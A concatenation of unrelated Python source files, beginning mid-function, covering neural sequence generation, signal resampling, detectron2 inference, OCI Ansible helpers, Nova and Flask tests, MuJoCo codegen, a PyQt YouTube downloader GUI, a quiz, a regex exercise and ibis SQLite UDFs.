criteria = False
if np.all(overload_matrix[sample] < overload):
criteria = True
return criteria
def modify_overload_matrix(sample, overload_matrix):
overload_matrix[sample] += 1
def remove_overloaded_indexes(overload_matrix, overload, available, removed):
# Take out the numbers who are overload enough
indexes_to_remove = np.where(overload_matrix >= overload)[0]
for index in indexes_to_remove:
if index not in removed:
available.remove(index)
removed.append(index)
def test_overlap_criteria(sample, sequences, overlap_dictionary, overlap, candidate_overlap, one_to_one):
"""
Test whether the new sample is not in violation of the overlap criteria
:param sample:
:param sequences:
:param overlap_dictionary:
:param overlap:
:param candidate_overlap:
:param one_to_one:
:return: overlap_criteria
"""
overlap_criteria = True
for sequence_number, overlap_vector in overlap_dictionary.items():
# Intersection
intersection = [val for val in sample if val in sequences[sequence_number]]
# If intersection is greater than overlap than overlap then change criteria
candidate_overlap[intersection] = 1
if one_to_one:
if len(intersection) > overlap:
overlap_criteria = False
break
# I have not figure out what this does, apparently it selects for overlap with the same units
# else:
# if np.sum(candidate_overlap) > overlap:
# overlap_criteria = False
# break
if not one_to_one:
for sequence_number, overlap_vector in overlap_dictionary.items():
intersection = [val for val in sample if val in sequences[sequence_number]]
if len(intersection) + np.sum(overlap_vector) > overlap:
overlap_criteria = False
return overlap_criteria
def modify_overlap_dictionary(overlap_dictionary, candidate_overlap, sample, n_sequence, sequences):
"""
This modifies the dictionary once a particular sample has been accepted in the sequences
:param overlap_dictionary: The dictionary with over
:param candidate_overlap:
:param sample:
:param n_sequence:
:param sequences:
:return:
"""
for sequence_number, overlap_vector in overlap_dictionary.items():
intersection = [val for val in sample if val in sequences[sequence_number]]
overlap_vector[intersection] = 1
# Insert the overlap_candidate
overlap_dictionary[n_sequence] = candidate_overlap
def remove_overlaped_indexes(overlap_dictionary, sequences, overlap, available, removed):
for sequence_number, overlap_vector in overlap_dictionary.items():
if np.sum(overlap_vector) >= overlap:
indexes_to_remove = sequences[sequence_number]
for index in indexes_to_remove:
if index not in removed:
available.remove(index)
removed.append(index)
def calculate_random_sequence(minicolumns, sequence_length, overlap, overload, one_to_one=True,
prng=np.random.RandomState(seed=0), total_sequences=10, max_iter=1e5):
# Auxiliary structures
sequences = []
overload_matrix = np.zeros(minicolumns)
available = [i for i in range(minicolumns)]
removed = []
overlap_dictionary = {}
n_sequence = 0
iter = 0
while n_sequence < total_sequences and iter < max_iter:
iter += 1
# Generate a possible sample
if len(available) > sequence_length:
sample = prng.choice(available, size=sequence_length, replace=False)
else:
break
# Criteria for overload
overload_criteria = test_overload_criteria(sample, overload_matrix, overload)
# Criteria for overlap
candidate_overlap = np.zeros(minicolumns)
overlap_criteria = test_overlap_criteria(sample, sequences, overlap_dictionary, overlap, candidate_overlap,
one_to_one)
if overlap_criteria and overload_criteria:
# Add the sample
sample_list = list(sample.copy())
# sample_list.sort()
sequences.append(sample_list)
# Overlap
modify_overlap_dictionary(overlap_dictionary, candidate_overlap, sample, n_sequence, sequences)
if not one_to_one:
remove_overlaped_indexes(overlap_dictionary, sequences, overlap, available, removed)
# Overload
modify_overload_matrix(sample, overload_matrix)
remove_overloaded_indexes(overload_matrix, overload, available, removed)
n_sequence += 1
return sequences, overlap_dictionary, overload_matrix
def calculate_overlap_matrix(sequences):
overlap_matrix = np.zeros((len(sequences), len(sequences)))
for index_1, sequence_1 in enumerate(sequences):
for index_2, sequence_2 in enumerate(sequences):
intersection = [val for val in sequence_1 if val in sequence_2]
overlap_matrix[index_1, index_2] = len(intersection)
overlap_matrix[np.diag_indices_from(overlap_matrix)] = 0
return overlap_matrix
def calculate_overlap_one_to_all(overlap_dictionary):
total_overlap = np.zeros(len(overlap_dictionary))
for index, overlap_vector in overlap_dictionary.items():
total_overlap[index] = np.sum(overlap_vector)
return total_overlap
def calculate_overlap_one_to_one(sequences):
overlap_matrix = calculate_overlap_matrix(sequences)
max_overlap = np.max(overlap_matrix, axis=1)
return max_overlap
################
# Old functions
#################
# def get_w_old(P, p, diagonal_zero=True):
# outer = np.outer(p, p)
# P_copy = np.copy(P)
#
# outer[outer < epsilon**2] = epsilon**2
# P_copy[P < epsilon] = epsilon**2
#
# w = np.log(P_copy / outer)
#
# #IPython.embed()
# if diagonal_zero:
# w[np.diag_indices_from(w)] = 0
# return w
#
#
# def get_w_protocol1(P, p):
# p_copy = np.copy(p)
# P_copy = np.copy(P)
#
# p_copy[p < epsilon] = epsilon
# P_copy[P < epsilon] = epsilon * epsilon
#
# aux = np.outer(p_copy, p_copy)
# w = np.log(P_copy / aux)
# # IPython.embed()
#
# return w
|
from os import listdir
from numpy import average
import csv
import random
def TsvToData(filePath):
"""This method reads .tsv file and returns the data, XY split in a tuple"""
with open(filePath,'r') as file:
lines = list(csv.reader(file, delimiter = '\t'))
data = [[int(x) for x in line[0].split(',')] for line in lines]
label = [line[1] for line in lines]
return(data, label)
def LoadFiles(filePath = None):
"""This method returns a dictionary of data which are divided into X and Y.
For example, if <file1.tsv>, <file2.tsv>, <file3.tsv> are loaded,
{"file1.tsv" : <data1>, "file2.tsv" : <data2>, "file3.tsv" : <data3>}
where each <data#> is formatted as ([data_0, ..., data_n], [label_0, ..., label_n])"""
if filePath == None:
path = input("What is the path of your data folder?\n>>> ")
else:
path = filePath
dataFiles = [file for file in listdir(path) if file[-4:]==".tsv"]
for fileNum in range(len(dataFiles)):
print("{0:02d}\t{1}".format(fileNum,dataFiles[fileNum]))
selections = [int(x) for x in input("Type in indices of files, each separated by spacing\n>>> ").split()]
filesDict = {}
for selection in selections:
filesDict[dataFiles[selection]] = TsvToData(path+"\\"+dataFiles[selection])
return(filesDict)
def TruncateToMinLength(dataCollection):
"""This method matches the length of the data by cutting off the tails of longer files"""
print("<<<TruncateToMinLength() in progress>>>")
# Get minimum length and file name of it
minLength = 9999999
fileName = ""
for name in dataCollection:
data = dataCollection[name][0]
for singleDataStream in range(len(data)):
if len(data[singleDataStream])<minLength:
minLength = len(data[singleDataStream])
fileName = "{0}, Line {1}".format(name, singleDataStream)
# Confirm user action
userAnswer = ""
while not(userAnswer.lower() == "y" or userAnswer.lower() == "n"):
userAnswer = input("The minimum length is {0} from {1}. Would you like to truncate the data?(Y/N)\n>>> ".format(minLength, fileName))
# Slice and return
if userAnswer.lower() == "y":
output = ([], [])
for dataFile in dataCollection:
for i in range(len(dataCollection[dataFile][0])):
output[0].append(dataCollection[dataFile][0][i][:minLength])
output[1].append(dataCollection[dataFile][1][i])
return output
def ElongateToMaxLength(dataCollection):
"""This method matches the length of the data by inputing average value to the tails of shorter files"""
maxLength = 0
fileName = ""
# Look for the max length
for name in dataCollection:
data = dataCollection[name][0]
for singleDataStream in range(len(data)):
if len(data[singleDataStream]) > maxLength:
maxLength = len(data[singleDataStream])
fileName = "{0}, Line {1}".format(name, singleDataStream)
# User confirmation
userAnswer = ""
while not(userAnswer.lower() == "y" or userAnswer.lower() == "n"):
userAnswer = input("The maximum length is {0} from {1}. Would you like to elongate the data?(Y/N)\n>>> ".format(maxLength, fileName))
# Splice a fake tail to the data and return
if userAnswer.lower() == "y":
output = ([], [])
for dataFile in dataCollection:
for i in range(len(dataCollection[dataFile][0])):
_data=dataCollection[dataFile][0][i]
lastPoint=_data[-1]
avg = average(_data)
lenDiff = maxLength-len(_data)
output[0].append(_data + [int(round((lastPoint * (lenDiff - i) + avg * i)/ lenDiff)) for i in range(lenDiff)])
output[1].append(dataCollection[dataFile][1][i])
return output
def SaveData(data, filePath = None, fileName = "Processed"):
"""This method saves an XY-split data into a tsv file"""
if filePath == None:
path = input("What is the path of your data folder?\n>>> ")
else:
path = filePath
with open(path + "\\{}.tsv".format(fileName), 'w') as file:
for lineNumber in range(len(data[0])):
file.write(",".join([str(x) for x in data[0][lineNumber]]) + "\t" + data[1][lineNumber] + "\n")
print("Saved the processed file\n")
def MatchFrequency(dataCollection, originalF = 7840, targetF = 45000):
"""This method compares the frequency difference and calls a data processing method accordingly"""
print("<<<MatchFrequency() in progress>>>")
output = ([], [])
print("Processing frequency match from {0} Hz to {1} Hz.".format(originalF, targetF))
if originalF > targetF:
process = DecreaseFrequency
elif originalF < targetF:
process = IncreaseFrequency
else:
process = (lambda x, originalF, targetF : x)
for dataFile in dataCollection:
for i in range(len(dataCollection[dataFile][0])):
processedData = process(dataCollection[dataFile][0][i], originalF, targetF)
output[0].append(processedData)
output[1].append(dataCollection[dataFile][1][i])
return output
def IncreaseFrequency(data, originalF, targetF):
"""This method uses interpolation to fill in the gaps"""
baseStep = targetF // originalF
randomAddPossibility = targetF % originalF
returnData = []
index = 0
endOfList = False
randAdd = [1 for i in range(randomAddPossibility)] + [0 for i in range(originalF - randomAddPossibility)]
while not endOfList:
random.shuffle(randAdd)
for randomArrayIndex in range(originalF):
try:
returnData += interpolate(data[index], data[index + 1], baseStep + randAdd[randomArrayIndex])
except IndexError:
endOfList = True
break
index += 1
return(returnData)
def interpolate(point1, point2, numberOfPoints, roundToInt = True):
"""<numberOfPoints> should be greater or equal to 1.
<numberOfPoints> is number of points from point1 until point2."""
if numberOfPoints == 1:
return([point1])
interval = (point2 - point1) / numberOfPoints
if roundToInt:
return([int(round(point1 + i * interval)) for i in range(numberOfPoints)])
return([point1 + i * interval for i in range(numberOfPoints)])
def DecreaseFrequency(data, originalF, targetF, avgOption = True):
"""Decrease frequency by sampling from original data.
This method uses psuedo random distribution to ensure it has rather uniform smapling rate match.
With avgOption on(True), the sampling will use the average of the missed datapoints.
If the option is False, it will sample from a single point."""
baseStep = originalF // targetF
randomAddPossibility = originalF % targetF
returnData = []
index = 0
endOfList = False
randAdd = list([1 for i in range(randomAddPossibility)] + [0 for i in range(targetF-randomAddPossibility)])
if avgOption:
prev = 0
while not endOfList:
random.shuffle(randAdd)
for randomArrayIndex in range(targetF):
slice = data[prev:index]
if not slice == []:
returnData.append(int(round(average(slice))))
else:
endOfList = True
break
prev = index
index += baseStep + randAdd[randomArrayIndex]
else:
while not endOfList:
random.shuffle(randAdd)
for randomArrayIndex in range(targetF):
try:
returnData.append(data[index])
except IndexError:
endOfList = True
break
index += baseStep + randAdd[randomArrayIndex]
return returnData
if (__name__ == "__main__"):
filePath = input("What is the path of your data folder?\n>>> ")
SaveData(MatchFrequency(LoadFiles(filePath)), filePath)
SaveData(ElongateToMaxLength(LoadFiles(filePath)), filePath)
|
"""
Do inference on msgpack file generated in Command Center
"""
import argparse
import io
import os
import msgpack
import torch
from PIL import Image
from detectron2.config import get_cfg
from detectron2.engine import DefaultPredictor
from torch.utils.data import Dataset
from torch.utils.data.dataloader import DataLoader
class FileDataset(Dataset):
def __init__(self, file_path) -> None:
super().__init__()
self.index = []
pos = 0
self.file_path = file_path
with open(file_path, "rb") as f:
unpacker = msgpack.Unpacker(f)
for _ in unpacker:
self.index.append(pos)
pos = unpacker.tell()
def __getitem__(self, index: int):
with open(self.file_path, "rb") as f:
f.seek(self.index[index])
unpacker = msgpack.Unpacker(f)
unpacked = unpacker.unpack()
image = Image.open(io.BytesIO(unpacked.get("data")))
return torch.tensor(image)
def __len__(self) -> int:
return len(self.index)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--file", required=True)
parser.add_argument("--skip_head", default=0)
parser.add_argument("--config", required=True)
parser.add_argument("--weights")
parser.add_argument("--output_dir", required=True)
parser.add_argument("--num_workers", default=4)
parser.add_argument("--write_original", action="store_true")
parser.add_argument("--write_processed", action="store_true")
parser.add_argument("--write_result_json", action="store_true")
args = parser.parse_args()
cfg = get_cfg()
cfg.merge_from_file(args.config)
if args.weights:
cfg.MODEL.WEIGHTS = args.weights
predictor = DefaultPredictor(cfg)
dataset = FileDataset(args.file)
dataloader = DataLoader(dataset, num_workers=args.num_workers)
for i, batch in dataloader:
print(f"Processing batch {i}")
output = predictor(batch)
|
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible_collections.oracle.oci.plugins.module_utils import oci_config_utils
try:
from oci.functions import FunctionsInvokeClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class FunctionActionsHelperCustom:
# invoke action uses a different client (FunctionsInvokeClient) than the one that is generated for the function
# resource (FunctionsManagementClient) based on other operations. Currently codegen only supports one client class
# for a resource. The other option would have been renaming the resource for this operation which would have
# generated with the invoke client. But we would still need the FunctionsManagementClient to get the functions
# endpoint.
# TODO: Add support for multiple client classes in codegen
def invoke(self):
if not self.module.params.get("dest"):
self.module.fail_json(msg="dest parameter required for invoke action")
function = self.get_resource().data
self.module.params["service_endpoint"] = function.invoke_endpoint
functions_invoke_client = oci_config_utils.create_service_client(
self.module, FunctionsInvokeClient
)
try:
# Temporarily change self.client in the context of this method. Preferring this over overriding the
# self.client to use FunctionsInvokeClient since there might be other actions (for ex: change_compartment)
# in the future which need the client generated by the generated module.
functions_management_client = self.client
self.client = functions_invoke_client
super(FunctionActionsHelperCustom, self).invoke()
return function
finally:
self.client = functions_management_client
|
# Copyright 2013 Intel Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for resource monitors."""
import mock
from nova.compute import monitors
from nova import test
class MonitorsTestCase(test.NoDBTestCase):
"""Test case for monitors."""
@mock.patch('stevedore.enabled.EnabledExtensionManager')
def test_check_enabled_monitor(self, _mock_ext_manager):
class FakeExt(object):
def __init__(self, ept, name):
self.entry_point_target = ept
self.name = name
# We check to ensure only one CPU monitor is loaded...
self.flags(compute_monitors=['mon1', 'mon2'])
handler = monitors.MonitorHandler(None)
ext_cpu_mon1 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
'mon1')
ext_cpu_mon2 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
'mon2')
self.assertTrue(handler.check_enabled_monitor(ext_cpu_mon1))
self.assertFalse(handler.check_enabled_monitor(ext_cpu_mon2))
# We check to ensure that the auto-prefixing of the CPU
# namespace is handled properly...
self.flags(compute_monitors=['cpu.mon1', 'mon2'])
handler = monitors.MonitorHandler(None)
ext_cpu_mon1 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
'mon1')
ext_cpu_mon2 = FakeExt('nova.compute.monitors.cpu.virt_driver:Monitor',
'mon2')
self.assertTrue(handler.check_enabled_monitor(ext_cpu_mon1))
self.assertFalse(handler.check_enabled_monitor(ext_cpu_mon2))
|
# Copyright 2022 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Code generator for function_traits.h."""
from typing import Mapping, Sequence
from absl import app
from introspect import ast_nodes
from introspect import enums
ENUMS: Mapping[str, ast_nodes.EnumDecl] = enums.ENUMS
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
struct_decls = []
for enum in ENUMS.values():
value_decls = []
for k in enum.values:
value_decls.append(f'std::make_pair("{k}", ::{enum.name}::{k})')
if len(value_decls) < 2:
value_decls = ''.join(value_decls)
else:
value_decls = '\n ' + ',\n '.join(value_decls)
struct_decls.append(f"""
struct {enum.name} {{
static constexpr char name[] = "{enum.name}";
using type = ::{enum.name};
static constexpr auto values = std::array{{{value_decls}}};
}};
""".strip())
all_structs = '\n\n'.join(struct_decls)
all_enum_inits = '\n ' + '{},\n '.join(ENUMS.keys()) + '{}'
print(f"""
// Copyright 2022 DeepMind Technologies Limited
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef MUJOCO_PYTHON_CODEGEN_ENUM_TRAITS_H_
#define MUJOCO_PYTHON_CODEGEN_ENUM_TRAITS_H_
#include <array>
#include <tuple>
#include <utility>
#include <mujoco.h>
namespace mujoco::python_traits {{
{all_structs}
static constexpr auto kAllEnums = std::make_tuple({all_enum_inits});
}} // namespace mujoco::python_traits
#endif // MUJOCO_PYTHON_CODEGEN_ENUM_TRAITS_H_
""".lstrip())
if __name__ == '__main__':
app.run(main)
|
import unittest
from jmilkfansblog.controllers import admin
from jmilkfansblog.controllers import rest_api
from jmilkfansblog import create_app
from jmilkfansblog.models import db
class TestURLs(unittest.TestCase):
"""Unit test for route functions."""
def setUp(self):
# Destroy the Flask-Admin and Flask-Result object after delete app
# object
admin._views = []
rest_api.resource = []
app = create_app('jmilkfansblog.config.TestConfig')
self.client = app.test_client()
# Using Test app for db
db.app = app
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
|
import threading
from PyQt5 import QtCore
from PyQt5.QtCore import QObject
from PyQt5.QtWidgets import QMainWindow, QLayout, QListWidgetItem
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QVBoxLayout
from PyQt5.QtWidgets import QHBoxLayout
from PyQt5.QtWidgets import QLineEdit
from PyQt5.QtWidgets import QPushButton
from PyQt5.QtWidgets import QCheckBox
from PyQt5.QtWidgets import QListWidget
from Downloader import Downloader
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QFileDialog
from UrlParserWorker import ParserWorker
import time
class DownloaderMainWindow(QMainWindow, QObject):
# the parameters are the type of object to be passed into the function the ui thread is going to execute, in this case just something to modify the widgets
# because we can only do so in ui thread
PARSE_URL_SIGNAL = QtCore.pyqtSignal(QListWidgetItem, str)
def __init__(self, download_manager=Downloader()):
super().__init__()
self.setWindowTitle("Pytube-GUI")
self.__download_manager = download_manager
# ui contains all the widgets for the main window, just like in qt creator lol
self.__ui = self.UI(self)
# makes sure the downloaded directory can't not be manually edited. This ensures the user chooses a valid path with browse button
self.__ui.dir_line_edit.setText(self.__download_manager.get_download_directory())
self.__ui.dir_line_edit.setReadOnly(True)
self.setCentralWidget(self.__ui)
# listener for the widgets
self.__ui.add_button.clicked.connect(self.add_button_clicked)
self.__ui.remove_button.clicked.connect(self.remove_button_clicked)
self.__ui.browse_button.clicked.connect(self.browse_button_clicked)
self.__ui.mp3_checkbox.clicked.connect(self.mp3_checked_clicked)
self.__ui.download_button.clicked.connect(self.download_button_clicked)
self.__ui.parallel_checkbox.clicked.connect(self.parallel_checkbox_clicked)
# hide the video list and download button because they will be empty
self.hide_list()
# connecting the signal with this parse_url_function so whenever it is emitted from another thread, this function will be executed in the ui thread.
self.PARSE_URL_SIGNAL.connect(self.set_list_widget_text)
self.__threads = []
self.__parsing_waitlist = []
print('GUI initialized')
def download_button_clicked(self):
if len(self.__parsing_waitlist) != 0:
QMessageBox.about(self, "Alert", "Wait for urls to finish parsing. Also remove the invalid and duplicated links first.")
return
# using native python thread to spun downloads. QThread is a pain in the ass
thread = threading.Thread(target=self.__download_button_thread_function, name='Download button clicked thread',args=())
thread.start()
def __download_button_thread_function(self):
print('\nStarting download.....')
# disables all the control until download finishes
self.__ui.add_button.setEnabled(False)
self.__ui.remove_button.setEnabled(False)
self.__ui.browse_button.setEnabled(False)
self.__ui.download_button.setEnabled(False)
self.__ui.download_button.setText('Downloading.....')
self.__ui.mp3_checkbox.setEnabled(False)
self.__ui.parallel_checkbox.setEnabled(False)
# download
self.__download_manager.download()
# turn control back on once the download manager finishes downloading
while self.__download_manager.get_number_of_downloads_in_progress() != 0:
time.sleep(1)
self.__ui.add_button.setEnabled(True)
self.__ui.remove_button.setEnabled(True)
self.__ui.browse_button.setEnabled(True)
self.__ui.download_button.setEnabled(True)
self.__ui.download_button.setText('Download')
self.__ui.mp3_checkbox.setEnabled(True)
self.__ui.parallel_checkbox.setEnabled(True)
def parallel_checkbox_clicked(self):
if self.__ui.parallel_checkbox.isChecked():
self.__download_manager.use_multithreading(True)
QMessageBox.about(self, "Alert", "Downloading in parallel enables downloads of multiple videos in parallel but do note that this feature is experimental")
else:
self.__download_manager.use_multithreading(False)
def show_list(self):
self.__ui.video_list.show()
self.__ui.download_button.show()
def hide_list(self):
self.__ui.video_list.hide()
self.__ui.download_button.hide()
def add_button_clicked(self):
self.__ui.video_list.addItem("Parsing url...")
item_position = self.__ui.video_list.count() - 1
item = self.__ui.video_list.item(item_position)
name = self.__ui.url_line_edit.text()
if self.__ui.download_button.isHidden():
self.show_list()
# add the video to the wait list so download button knows if its url is invalid or still waiting to be parse
self.__parsing_waitlist.append(item)
# creating the parser worker which can emit signals for ui thead to update widgets, also need to scope it to an instance else thread will malfunction lol, fuck python
self.worker = ParserWorker(item, name, self)
# creating thread object
thread = QtCore.QThread()
# add threads to the thread list because pyqt5 will annoyingly destroy ui thread if the thread object is garbabged collected cuz these threads do not die for some reason
self.__threads.append(thread)
# moved worker to a thread so workers work is multithreaded
self.worker.moveToThread(thread)
# have thread execute worker's work whenever it is started
thread.started.connect(self.worker.run)
# start the worker
thread.start()
def parse_Url_Function(self, item, url):
video_name = self.__download_manager.add_video(url)
# remove the video from the wait list because its link is successfully parsed
print('url parsing is successful!')
self.__parsing_waitlist.remove(item)
return video_name
def set_list_widget_text(self, item, text):
item.setText(text)
def remove_button_clicked(self):
if self.__ui.video_list.currentItem() is None:
QMessageBox.about(self, "Alert", "You need to select an item in the video list")
return
selectedItem = self.__ui.video_list.currentItem()
self.__ui.video_list.takeItem(self.__ui.video_list.row(selectedItem))
self.__download_manager.remove_video(selectedItem.text())
if selectedItem in self.__parsing_waitlist:
self.__parsing_waitlist.remove(selectedItem)
self.__ui.video_list.setCurrentItem(None)
self.__ui.video_list.clearFocus()
if self.__ui.video_list.count() == 0:
self.hide_list()
def browse_button_clicked(self):
dir = QFileDialog.getExistingDirectory(parent=self, directory=self.__download_manager.get_download_directory(), options=QFileDialog.DontResolveSymlinks)
if dir != "":
self.__ui.dir_line_edit.setText(dir)
self.__download_manager.set_download_directory(dir)
def mp3_checked_clicked(self):
self.__download_manager.mp3_mode_on(self.__ui.mp3_checkbox.isChecked());
class UI(QWidget):
def __init__(self, parent):
super().__init__(parent)
self.layout = QVBoxLayout()
# fixed the size constraint
self.layout.setSizeConstraint(QLayout.SetFixedSize);
self.init_gui()
self.setLayout(self.layout)
self.layoutsize = self.size()
def init_gui(self):
# set up first h box items
self.h_box1 = QHBoxLayout()
self.paste_label = QLabel('Paste the youtube url here: ')
self.url_line_edit = QLineEdit()
self.url_line_edit.setMaximumWidth(300);
self.url_line_edit.setFixedWidth(310);
self.h_box1.addWidget(self.paste_label)
self.h_box1.addWidget(self.url_line_edit)
self.layout.addLayout(self.h_box1)
# set up 2nd h box items
self.h_box2 = QHBoxLayout()
self.dir_line_edit = QLineEdit()
self.browse_button = QPushButton('Browse')
self.h_box2.addWidget(self.browse_button)
self.h_box2.addWidget(self.dir_line_edit)
self.layout.addLayout(self.h_box2)
# set up third h box items
self.h_box3 = QHBoxLayout()
self.parallel_checkbox = QCheckBox('Download in parallel')
self.mp3_checkbox = QCheckBox('mp3 only')
self.add_button = QPushButton('Add')
self.remove_button = QPushButton('Remove')
self.h_box3.addStretch(1);
self.h_box3.addWidget(self.parallel_checkbox)
self.h_box3.addWidget(self.mp3_checkbox)
self.h_box3.addWidget(self.add_button)
self.h_box3.addWidget(self.remove_button)
self.layout.addLayout(self.h_box3)
# set up added video lists and download button
self.download_button = QPushButton('Download')
self.video_list = QListWidget(self)
self.layout.addWidget(self.video_list)
self.layout.addWidget(self.download_button)
|
import random
def ask(num, scores, question, answers):
"""
example, ask(2, scores, "What is your favorite color?",
[["Red", "patrick"], ["Blue", "squidward"], ["Yellow", "spongebob"]])
"""
random.shuffle(answers)
letters = ["A", "B", "C", "D", "E"]
print("{0}. {1}".format(num, question))
for i in range(len(answers)):
print("{0}. {1}".format(letters[i], answers[i][0]))
answer = input().upper()
index = -1
for i in range(len(letters)):
if answer == letters[i]:
index = i
if index == -1:
print("No response recorded")
else:
scores[answers[index][1]] = scores.get(answers[index][1], 0) + answers[index][2]
questions = [
"What is the best way to spend your day?",
"What is your favorite snack?"
]
answers = [
[ # What is the best way to spend your day?
["Cashing in at the casino", "krabs", 1.0],
["Hanging with the squad", "patrick", 0.3],
["Observing the fine arts", "squidward", 0.9],
["Working your favorite job", "spongebob", 1.0]
],
[ # What is your favorite snack?
["Ketchup Packets", "krabs", 0.8],
["Sand", "patrick", 0.6],
["Chocolate Mousse", "squidward", 0.4],
["Krabby Patty", "spongebob", 1.0]
]
]
scores = {}
for i in range(len(questions)):
ask(i+1, scores, questions[i], answers[i])
# todo check scores
print(scores)
|
# calculation for egex_sum_42.txt
import re
ofile = open('regex_sum_699035.txt')
newl = list()
sum = 0
for aline in ofile:
aline = aline.strip()
stuff = re.findall('[0-9]+', aline)
for e in stuff:
sum = sum + float(e)
print(sum)
#
newline = '<p>Please click <a href="http://www.dr-chuck.com">here</a></p>'
print(re.findall('href="(.+)"', newline))
|
import functools
import inspect
import math
import regex as re
_SQLITE_UDF_REGISTRY = set()
_SQLITE_UDAF_REGISTRY = set()
def udf(f):
"""Create a SQLite scalar UDF from `f`
Parameters
----------
f
A callable object
Returns
-------
callable
A callable object that returns ``None`` if any of its inputs are
``None``.
"""
@functools.wraps(f)
def wrapper(*args):
if any(arg is None for arg in args):
return None
return f(*args)
_SQLITE_UDF_REGISTRY.add(wrapper)
return wrapper
def udaf(cls):
"""Register a UDAF class with any SQLite connection."""
_SQLITE_UDAF_REGISTRY.add(cls)
return cls
@udf
def _ibis_sqlite_reverse(string):
return string[::-1]
@udf
def _ibis_sqlite_string_ascii(string):
return ord(string[0])
@udf
def _ibis_sqlite_capitalize(string):
return string.capitalize()
@udf
def _ibis_sqlite_translate(string, from_string, to_string):
table = str.maketrans(from_string, to_string)
return string.translate(table)
@udf
def _ibis_sqlite_regex_search(string, regex):
"""Return whether `regex` exists in `string`.
Parameters
----------
string : str
regex : str
Returns
-------
found : bool
"""
return re.search(regex, string) is not None
@udf
def _ibis_sqlite_regex_replace(string, pattern, replacement):
"""Replace occurences of `pattern` in `string` with `replacement`.
Parameters
----------
string : str
pattern : str
replacement : str
Returns
-------
result : str
"""
return re.sub(pattern, replacement, string)
@udf
def _ibis_sqlite_regex_extract(string, pattern, index):
"""Extract match of regular expression `pattern` from `string` at `index`.
Parameters
----------
string : str
pattern : str
index : int
Returns
-------
result : str or None
"""
result = re.search(pattern, string)
if result is not None and 0 <= index <= (result.lastindex or -1):
return result.group(index)
return None
@udf
def _ibis_sqlite_exp(arg):
"""Exponentiate `arg`.
Parameters
----------
arg : number
Number to raise to `e`.
Returns
-------
result : Optional[number]
None If the input is None
"""
return math.exp(arg)
@udf
def _ibis_sqlite_log(arg, base):
if arg < 0 or base < 0:
return None
return math.log(arg, base)
@udf
def _ibis_sqlite_ln(arg):
if arg < 0:
return None
return math.log(arg)
@udf
def _ibis_sqlite_log2(arg):
return _ibis_sqlite_log(arg, 2)
@udf
def _ibis_sqlite_log10(arg):
return _ibis_sqlite_log(arg, 10)
@udf
def _ibis_sqlite_floor(arg):
return math.floor(arg)
@udf
def _ibis_sqlite_ceil(arg):
return math.ceil(arg)
@udf
def _ibis_sqlite_sign(arg):
if not arg:
return 0
return math.copysign(1, arg)
@udf
def _ibis_sqlite_floordiv(left, right):
return left // right
@udf
def _ibis_sqlite_mod(left, right):
return left % right
@udf
def _ibis_sqlite_power(arg, power):
"""Raise `arg` to the `power` power.
Parameters
----------
arg : number
Number to raise to `power`.
power : number
Number to raise `arg` to.
Returns
-------
result : Optional[number]
None If either argument is None or we're trying to take a fractional
power or a negative number
"""
if arg < 0.0 and not power.is_integer():
return None
return arg**power
@udf
def _ibis_sqlite_sqrt(arg):
"""Square root of `arg`.
Parameters
----------
arg : Optional[number]
Number to take the square root of
Returns
-------
result : Optional[number]
None if `arg` is None or less than 0 otherwise the square root
"""
return None if arg is None or arg < 0.0 else math.sqrt(arg)
class _ibis_sqlite_var:
def __init__(self, offset):
self.mean = 0.0
self.sum_of_squares_of_differences = 0.0
self.count = 0
self.offset = offset
def step(self, value):
if value is not None:
self.count += 1
delta = value - self.mean
self.mean += delta / self.count
self.sum_of_squares_of_differences += delta * (value - self.mean)
def finalize(self):
count = self.count
if count:
return self.sum_of_squares_of_differences / (count - self.offset)
return None
@udaf
class _ibis_sqlite_var_pop(_ibis_sqlite_var):
def __init__(self):
super().__init__(0)
@udaf
class _ibis_sqlite_var_samp(_ibis_sqlite_var):
def __init__(self):
super().__init__(1)
def _number_of_arguments(callable):
signature = inspect.signature(callable)
parameters = signature.parameters.values()
kinds = [param.kind for param in parameters]
valid_kinds = (
inspect.Parameter.POSITIONAL_OR_KEYWORD,
inspect.Parameter.POSITIONAL_ONLY,
)
if any(kind not in valid_kinds for kind in kinds) or any(
param.default is not inspect.Parameter.empty for param in parameters
):
raise TypeError(
'Only positional arguments without defaults are supported in Ibis '
'SQLite function registration'
)
return len(parameters)
